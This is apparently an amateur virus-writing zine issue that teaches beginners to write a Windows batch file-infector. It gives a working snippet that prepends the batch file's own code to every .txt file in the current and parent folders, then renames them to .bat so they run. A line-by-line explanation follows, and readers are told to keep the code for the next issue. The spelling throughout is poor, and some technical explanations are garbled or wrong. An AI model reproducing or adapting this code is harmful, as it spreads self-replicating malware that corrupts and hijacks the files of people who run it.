 
 **********   ******   ****  **             **
 ***********  ******  ******  **           **
 **      ***    **   **    **  **         **
 **********     **   **         **       **
 *********      **   **          **     **
 **     **      **   **    **     **   **
 **     ***   ******  ******       ** **
 **     ****  ******   ****         ***
 Magazine 1 Batch adder beginers


to start r say how to git your Batch Virus to add it code to a TXT file

<--------------------------------<CODE ADDER>-------------------------->

FOR %%i IN (*.txt ../*.txt) DO copy %0+%%i %%i>NUL
copy %0+NUL

<--------------------------------<TECHNICAl DETAILS>------------------->

(*.txt ../*.txt) is the file type it can be all type of files say you wot it to be VBS all you got to do is (*.vbs ../*.vbs)

copy is copy 

%0 is the file 

%%i is all the file type 

%0+%%i is add %0 code to %%i 

%%i>NUL is %%i = NUL 

copy %0+NUL is add code to NUL

NUL is all the file type 

<--------------------------------<CHANGE FILE TYPE>------------------->

For a group of files with extension .txt that you want to change to .bat try this:

ren *.txt *.bat

<--------------------------------<TECHNICAl DETAILS>------------------->

ren *.txt *.bat is change .TXT to .BAT file

<----------------------------------------------------------------------->

ok now add CODE ADDER and CHANGE FILE TYPE so you git 

FOR %%i IN (*.txt ../*.txt) DO copy %0+%%i %%i>NUL
copy %0+NUL
ren *.txt *.bat

change the code to wot you wunt it to be and save it on your PC we r going to use
it in Magazine 2 soon